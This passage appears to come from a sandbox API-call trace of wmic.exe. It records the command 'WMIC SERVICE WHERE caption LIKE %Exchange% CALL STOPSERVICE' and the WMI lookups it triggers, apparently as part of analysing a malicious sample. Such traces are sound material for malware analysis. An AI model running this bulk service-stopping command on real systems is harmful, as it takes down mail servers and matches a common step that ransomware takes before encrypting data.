(param_1="htable-sortby.xsl") returned 0x11 [0105.630] SysStringLen (param_1="XML") returned 0x3 [0105.630] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0105.630] SysStringLen (param_1="texttablewsys") returned 0xd [0105.630] SysStringLen (param_1="XML") returned 0x3 [0105.630] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0105.631] SysStringLen (param_1="htable-sortby") returned 0xd [0105.631] SysStringLen (param_1="TABLE") returned 0x5 [0105.631] SysStringLen (param_1="htable-sortby") returned 0xd [0105.631] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.631] SysStringLen (param_1="htable-sortby") returned 0xd [0105.631] SysStringLen (param_1="XML") returned 0x3 [0105.631] SysStringLen (param_1="htable-sortby") returned 0xd [0105.631] SysStringLen (param_1="texttablewsys") returned 0xd [0105.631] SysStringLen (param_1="htable-sortby") returned 0xd [0105.631] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0105.631] SysStringLen (param_1="XML") returned 0x3 [0105.631] SysStringLen (param_1="htable-sortby") returned 0xd [0105.631] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0105.631] SysStringLen (param_1="TABLE") returned 0x5 [0105.631] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0105.631] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.631] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0105.631] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.631] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0105.631] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0105.631] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.631] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0105.632] SysStringLen (param_1="wmiclimofformat") returned 0xf [0105.632] SysStringLen (param_1="TABLE") returned 0x5 [0105.632] SysStringLen (param_1="wmiclimofformat") returned 0xf [0105.632] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.632] SysStringLen (param_1="wmiclimofformat") returned 0xf [0105.632] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.632] SysStringLen (param_1="wmiclimofformat") returned 0xf [0105.632] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0105.632] SysStringLen (param_1="wmiclimofformat") returned 0xf [0105.632] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0105.632] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.632] SysStringLen (param_1="wmiclimofformat") returned 0xf [0105.632] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0105.632] SysStringLen (param_1="TABLE") returned 0x5 [0105.632] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0105.632] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.632] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0105.632] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.632] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0105.632] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.632] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.632] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0105.633] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0105.633] SysStringLen (param_1="TABLE") returned 0x5 [0105.633] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0105.633] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.633] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0105.633] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.633] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0105.633] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.633] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0105.633] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0105.633] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.633] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0105.633] FreeThreadedDOMDocument:IUnknown:Release (This=0xcc45a8) returned 0x0 [0105.633] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE" [0105.633] memcpy_s (in: _Destination=0x888040, _DestinationSize=0x8e, _Source=0x5e1588, _SourceSize=0x80 | out: _Destination=0x888040) returned 0x0 [0105.633] GetLocalTime (in: lpSystemTime=0x51f7c0 | out: lpSystemTime=0x51f7c0*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x8, wSecond=0x3a, wMilliseconds=0x1f0)) [0105.633] _vsnwprintf (in: _Buffer=0x8880d8, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x51f7a0 | out: _Buffer="04-15-2018T10:08:58") returned 19 [0105.633] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE") returned 60 [0105.633] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE") returned 60 [0105.633] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE") returned 60 [0105.634] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE") returned 60 [0105.634] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE") returned 60 [0105.634] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE") returned 60 [0105.634] lstrlenW (lpString="SERVICE") returned 7 [0105.634] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0105.634] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE") returned 60 [0105.634] lstrlenW (lpString="WHERE") returned 5 [0105.634] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0105.634] memmove_s (in: _Destination=0x882c78, _DestinationSize=0x4, _Source=0x882c68, _SourceSize=0x4 | out: _Destination=0x882c78) returned 0x0 [0105.634] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE") returned 60 [0105.634] lstrlenW (lpString="'caption LIKE '%Exchange%''") returned 27 [0105.634] _wcsicmp (_String1="'caption LIKE '%Exchange%''", _String2="\"NULL\"") returned 5 [0105.634] lstrlenW (lpString="'caption LIKE '%Exchange%''") returned 27 [0105.634] lstrlenW (lpString="'caption LIKE '%Exchange%''") returned 27 [0105.634] memmove_s (in: _Destination=0x887ed8, _DestinationSize=0x8, _Source=0x882c78, _SourceSize=0x8 | out: _Destination=0x887ed8) returned 0x0 [0105.634] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE") returned 60 [0105.634] lstrlenW (lpString="CALL") returned 4 [0105.634] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0105.634] memmove_s (in: _Destination=0x887f08, _DestinationSize=0xc, _Source=0x887ed8, _SourceSize=0xc | out: _Destination=0x887f08) returned 0x0 [0105.634] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE") returned 60 [0105.634] lstrlenW (lpString="STOPSERVICE") returned 11 [0105.634] _wcsicmp (_String1="STOPSERVICE", _String2="\"NULL\"") returned 81 [0105.634] memmove_s (in: _Destination=0x882218, _DestinationSize=0x10, _Source=0x887f08, _SourceSize=0x10 | out: _Destination=0x882218) returned 0x0 [0105.634] lstrlenW (lpString="QUIT") returned 4 [0105.634] lstrlenW (lpString="SERVICE") returned 7 [0105.634] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0105.634] lstrlenW (lpString="EXIT") returned 4 [0105.634] lstrlenW (lpString="SERVICE") returned 7 [0105.634] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0105.635] WbemLocator:IUnknown:AddRef (This=0x5e0500) returned 0x2 [0105.635] lstrlenW (lpString="/") returned 1 [0105.635] lstrlenW (lpString="SERVICE") returned 7 [0105.635] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0105.635] lstrlenW (lpString="-") returned 1 [0105.635] lstrlenW (lpString="SERVICE") returned 7 [0105.635] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0105.635] lstrlenW (lpString="CLASS") returned 5 [0105.635] lstrlenW (lpString="SERVICE") returned 7 [0105.635] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0105.635] lstrlenW (lpString="PATH") returned 4 [0105.635] lstrlenW (lpString="SERVICE") returned 7 [0105.635] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0105.635] lstrlenW (lpString="CONTEXT") returned 7 [0105.635] lstrlenW (lpString="SERVICE") returned 7 [0105.635] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0105.635] lstrlenW (lpString="SERVICE") returned 7 [0105.635] lstrlenW (lpString="SERVICE") returned 7 [0105.635] GetCurrentThreadId () returned 0xcc8 [0105.635] ??0CHString@@QAE@XZ () returned 0x51f714 [0105.635] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5e0500, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0x610828) returned 0x0 [0105.722] CoSetProxyBlanket (pProxy=0x610828, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0105.722] ??1CHString@@QAE@XZ () returned 0x74a66430 [0105.722] GetCurrentThreadId () returned 0xcc8 [0105.722] ??0CHString@@QAE@XZ () returned 0x51f6bc [0105.722] SysStringLen (param_1="root\\cli") returned 0x8 [0105.722] SysStringLen (param_1="\\") returned 0x1 [0105.722] SysStringLen (param_1="root\\cli\\") returned 0x9 [0105.722] SysStringLen (param_1="ms_409") returned 0x6 [0105.722] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5e0500, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0x610be8) returned 0x0 [0105.730] ??1CHString@@QAE@XZ () returned 0x74a66430 [0105.730] GetCurrentThreadId () returned 0xcc8 [0105.730] ??0CHString@@QAE@XZ () returned 0x51f718 [0105.731] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0105.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x8899a0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0105.731] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0105.731] SysStringLen (param_1="SERVICE") returned 0x7 [0105.731] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0105.731] SysStringLen (param_1="'") returned 0x1 [0105.731] IWbemServices:GetObject (in: This=0x610828, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x51f714*=0x0, ppCallResult=0x0 | out: ppObject=0x51f714*=0x635348, ppCallResult=0x0) returned 0x0 [0105.737] IWbemClassObject:Get (in: This=0x635348, wszName="Target", lFlags=0, pVal=0x51f6ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51f6ec*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.737] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0105.737] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0105.737] IWbemClassObject:Get (in: This=0x635348, wszName="PWhere", lFlags=0, pVal=0x51f6ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51f6ec*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.737] lstrlenW (lpString="WHERE Name='#'") returned 14 [0105.738] lstrlenW (lpString="WHERE Name='#'") returned 14 [0105.738] IWbemClassObject:Get (in: This=0x635348, wszName="Connection", lFlags=0, pVal=0x51f6ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51f6ec*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x635708, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.738] IUnknown:QueryInterface (in: This=0x635708, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x51f708 | out: ppvObject=0x51f708*=0x635708) returned 0x0 [0105.738] GetCurrentThreadId () returned 0xcc8 [0105.738] ??0CHString@@QAE@XZ () returned 0x51f688 [0105.738] IWbemClassObject:Get (in: This=0x635708, wszName="Namespace", lFlags=0, pVal=0x51f66c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51f66c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.738] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0105.738] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0105.738] IWbemClassObject:Get (in: This=0x635708, wszName="Locale", lFlags=0, pVal=0x51f66c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x617254, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51f66c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.738] lstrlenW (lpString="ms_409") returned 6 [0105.738] lstrlenW (lpString="ms_409") returned 6 [0105.738] IWbemClassObject:Get (in: This=0x635708, wszName="User", lFlags=0, pVal=0x51f66c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x617254, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51f66c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.738] IWbemClassObject:Get (in: This=0x635708, wszName="Password", lFlags=0, pVal=0x51f66c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51f66c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.738] IWbemClassObject:Get (in: This=0x635708, wszName="Server", lFlags=0, pVal=0x51f66c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51f66c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.738] lstrlenW (lpString=".") returned 1 [0105.738] lstrlenW (lpString=".") returned 1 [0105.738] IWbemClassObject:Get (in: This=0x635708, wszName="Authority", lFlags=0, pVal=0x51f66c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x617254, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51f66c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.739] ??1CHString@@QAE@XZ () returned 0x74a66430 [0105.739] IUnknown:Release (This=0x635708) returned 0x1 [0105.739] GetCurrentThreadId () returned 0xcc8 [0105.739] ??0CHString@@QAE@XZ () returned 0x51f678 [0105.739] IWbemClassObject:Get (in: This=0x635348, wszName="__RELPATH", lFlags=0, pVal=0x51f660*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.739] GetCurrentThreadId () returned 0xcc8 [0105.739] ??0CHString@@QAE@XZ () returned 0x51f5f4 [0105.739] ??0CHString@@QAE@PBG@Z () returned 0x51f5f0 [0105.739] ??0CHString@@QAE@ABV0@@Z () returned 0x51f570 [0105.739] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0105.739] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x8899a0 [0105.739] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0105.739] ?Left@CHString@@QBE?AV1@H@Z () returned 0x51f568 [0105.739] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x51f56c [0105.739] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x51f5f0 [0105.739] ??1CHString@@QAE@XZ () returned 0x1 [0105.739] ??1CHString@@QAE@XZ () returned 0x1 [0105.739] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x51f564 [0105.739] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x51f570 [0105.739] ??1CHString@@QAE@XZ () returned 0x1 [0105.739] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x889a00 [0105.739] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0105.739] ?Left@CHString@@QBE?AV1@H@Z () returned 0x51f568 [0105.739] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x51f56c [0105.739] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x51f5f0 [0105.739] ??1CHString@@QAE@XZ () returned 0x1 [0105.739] ??1CHString@@QAE@XZ () returned 0x1 [0105.739] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x51f564 [0105.739] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x51f570 [0105.739] ??1CHString@@QAE@XZ () returned 0x74a66430 [0105.739] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0105.739] ??1CHString@@QAE@XZ () returned 0x74a66430 [0105.739] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0105.739] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0105.740] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0105.740] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0105.740] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0105.740] SysStringLen (param_1="\"") returned 0x1 [0105.740] IWbemServices:GetObject (in: This=0x610be8, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x51f600*=0x0, ppCallResult=0x0 | out: ppObject=0x51f600*=0x635ae8, ppCallResult=0x0) returned 0x0 [0105.741] IWbemClassObject:Get (in: This=0x635ae8, wszName="Text", lFlags=0, pVal=0x51f5cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51f5cc*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x61f328*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x613610, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.741] SafeArrayGetLBound (in: psa=0x61f328, nDim=0x1, plLbound=0x51f5dc | out: plLbound=0x51f5dc) returned 0x0 [0105.741] SafeArrayGetUBound (in: psa=0x61f328, nDim=0x1, plUbound=0x51f5e0 | out: plUbound=0x51f5e0) returned 0x0 [0105.741] SafeArrayGetElement (in: psa=0x61f328, rgIndices=0x51f5f8, pv=0x51f5e4 | out: pv=0x51f5e4) returned 0x0 [0105.741] SysStringLen (param_1="Service application management. ") returned 0x20 [0105.741] IUnknown:Release (This=0x635ae8) returned 0x0 [0105.741] ??1CHString@@QAE@XZ () returned 0x1 [0105.742] ??1CHString@@QAE@XZ () returned 0x74a66430 [0105.742] ??1CHString@@QAE@XZ () returned 0x74a66430 [0105.742] lstrlenW (lpString="Service application management. ") returned 32 [0105.742] lstrlenW (lpString="Service application management. ") returned 32 [0105.742] IUnknown:Release (This=0x635348) returned 0x0 [0105.742] ??1CHString@@QAE@XZ () returned 0x74a66430 [0105.742] lstrlenW (lpString="PATH") returned 4 [0105.742] lstrlenW (lpString="WHERE") returned 5 [0105.742] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0105.742] lstrlenW (lpString="WHERE") returned 5 [0105.742] lstrlenW (lpString="WHERE") returned 5 [0105.742] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0105.742] lstrlenW (lpString="/") returned 1 [0105.742] lstrlenW (lpString="caption LIKE '%Exchange%'") returned 25 [0105.742] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%Exchange%'", cchCount1=25, lpString2="/", cchCount2=1) returned 3 [0105.742] lstrlenW (lpString="-") returned 1 [0105.742] lstrlenW (lpString="caption LIKE '%Exchange%'") returned 25 [0105.742] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%Exchange%'", cchCount1=25, lpString2="-", cchCount2=1) returned 3 [0105.743] lstrlenW (lpString="caption LIKE '%Exchange%'") returned 25 [0105.743] lstrlenW (lpString="caption LIKE '%Exchange%'") returned 25 [0105.743] lstrlenW (lpString="/") returned 1 [0105.743] lstrlenW (lpString="CALL") returned 4 [0105.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0105.743] lstrlenW (lpString="-") returned 1 [0105.743] lstrlenW (lpString="CALL") returned 4 [0105.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0105.743] lstrlenW (lpString="CALL") returned 4 [0105.743] lstrlenW (lpString="CALL") returned 4 [0105.743] lstrlenW (lpString="GET") returned 3 [0105.743] lstrlenW (lpString="CALL") returned 4 [0105.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0105.743] lstrlenW (lpString="LIST") returned 4 [0105.743] lstrlenW (lpString="CALL") returned 4 [0105.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0105.743] lstrlenW (lpString="SET") returned 3 [0105.743] lstrlenW (lpString="CALL") returned 4 [0105.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0105.743] lstrlenW (lpString="CREATE") returned 6 [0105.743] lstrlenW (lpString="CALL") returned 4 [0105.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0105.743] lstrlenW (lpString="CALL") returned 4 [0105.743] lstrlenW (lpString="CALL") returned 4 [0105.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0105.743] lstrlenW (lpString="/") returned 1 [0105.743] lstrlenW (lpString="STOPSERVICE") returned 11 [0105.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0105.743] lstrlenW (lpString="-") returned 1 [0105.743] lstrlenW (lpString="STOPSERVICE") returned 11 [0105.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0105.743] lstrlenW (lpString="STOPSERVICE") returned 11 [0105.743] lstrlenW (lpString="STOPSERVICE") returned 11 [0105.743] GetCurrentThreadId () returned 0xcc8 [0105.743] ??0CHString@@QAE@XZ () returned 0x51ee84 [0105.743] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0105.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x889a30, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0105.743] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0105.744] SysStringLen (param_1="SERVICE") returned 0x7 [0105.744] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0105.744] SysStringLen (param_1="'") returned 0x1 [0105.744] IWbemServices:GetObject (in: This=0x610828, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x51ee60*=0x0, ppCallResult=0x0 | out: ppObject=0x51ee60*=0x635348, ppCallResult=0x0) returned 0x0 [0105.749] lstrlenW (lpString="CALL") returned 4 [0105.749] lstrlenW (lpString="CALL") returned 4 [0105.749] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0105.749] IWbemClassObject:Get (in: This=0x635348, wszName="Verbs", lFlags=0, pVal=0x51ee18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51ee18*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x61f5f8*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x61f3d8, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.750] SafeArrayGetLBound (in: psa=0x61f5f8, nDim=0x1, plLbound=0x51ee28 | out: plLbound=0x51ee28) returned 0x0 [0105.750] SafeArrayGetUBound (in: psa=0x61f5f8, nDim=0x1, plUbound=0x51ee30 | out: plUbound=0x51ee30) returned 0x0 [0105.750] SafeArrayGetElement (in: psa=0x61f5f8, rgIndices=0x51ee38, pv=0x51ee6c | out: pv=0x51ee6c) returned 0x0 [0105.750] IWbemClassObject:Get (in: This=0x636d10, wszName="Name", lFlags=0, pVal=0x51ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51ee08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.750] lstrlenW (lpString="StartService") returned 12 [0105.750] lstrlenW (lpString="STOPSERVICE") returned 11 [0105.750] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0105.750] IUnknown:Release (This=0x636d10) returned 0x1 [0105.750] SafeArrayGetElement (in: psa=0x61f5f8, rgIndices=0x51ee38, pv=0x51ee6c | out: pv=0x51ee6c) returned 0x0 [0105.750] IWbemClassObject:Get (in: This=0x637240, wszName="Name", lFlags=0, pVal=0x51ee08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51ee08*(varType=0x8, 